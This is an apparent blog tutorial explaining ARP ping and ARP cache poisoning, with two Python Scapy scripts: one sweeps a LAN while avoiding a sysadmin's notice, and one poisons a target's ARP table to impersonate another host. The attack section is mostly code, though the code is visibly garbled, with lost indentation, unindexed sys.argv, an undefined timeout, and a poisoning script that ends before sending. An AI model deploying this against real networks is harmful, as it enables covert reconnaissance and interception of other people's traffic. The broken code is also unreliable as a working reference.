Usually we use the ping command to check if a machine exists at the address we ping, if we get a reply (Pong!) we know there’s a machine at that address. The traditional ping works using the ICMP protocol and sends icmp-echo-request (Ping) and icmp-echo-reply (Pong) packets. A machine can choose to ignore the echo requests and don’t reply in order to hide itself.
We can use the ARP protocol which is used to resolve MAC addresses of hosts to ping machine on a local area network. We can use that technique to map a LAN in a less obvious way and hope to avoid detection by a diligent sysadmin.
Here’s a Python script that uses the Scapy library to preform a ARP ping on a single target.
# Sends an arp resolution request on broadcast for an IP address
# If reply is received within timeout the host is alive
from scapy.all import *
if len(sys.argv) != 2:
print "Usage: arp_ping.py IP"
answered,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv),timeout=Timeout,verbose=False)
if len(answered) > 0:
print answered.getlayer(ARP).pdst, "is up"
elif len(unanswered) > 0:
print unanswered.getlayer(ARP).pdst, " is down"
What is ARP poisoning
Machines on a TCP/IP local area network identify each other and communicate using the physical addresses of their network adapters (MAC address). Every machine keeps a list (cache) of neighboring machines and their MAC addresses, if that list is contaminated, i.e a machine on that list will have the wrong MAC address. All communication to that machine will be directed to the wrong machine.
ARP poisoning is the method of tricking a machine to save data on about an IP address with the wrong MAC address in it’s ARP table.
How the script works
The following script gets two arguments
HOST_TO_ATTACK – The machine we want to poison
HOST_TO_IMPERSONATE – The machine we want the poisoned machine to think we are, so when it want to communicate with that machine, it will actually communicate with us.
The script queries the target machine for it’s mac address by sending an who-has packet to broadcast.
The who-has packet has fake source IP address coupled with the attacker MAC address.
When the target gets the who-has packet the target will store the false IP and MAC address data in it’s ARP table.
# Python arp poison example script
# Written by aviran
# visit for more details aviran.org
from scapy.all import *
my_macs = [get_if_hwaddr(i) for i in get_if_list()]
for mac in my_macs:
if(mac != "00:00:00:00:00:00"):
if len(sys.argv) != 3:
print "Usage: arp_poison.py HOST_TO_ATTACK HOST_TO_IMPERSONATE"
my_mac = get_mac_address()
if not my_mac:
print "Cant get local mac address, quitting"
packet = Ether()/ARP(op="who-has",hwsrc=my_mac,psrc=sys.argv,pdst=sys.argv)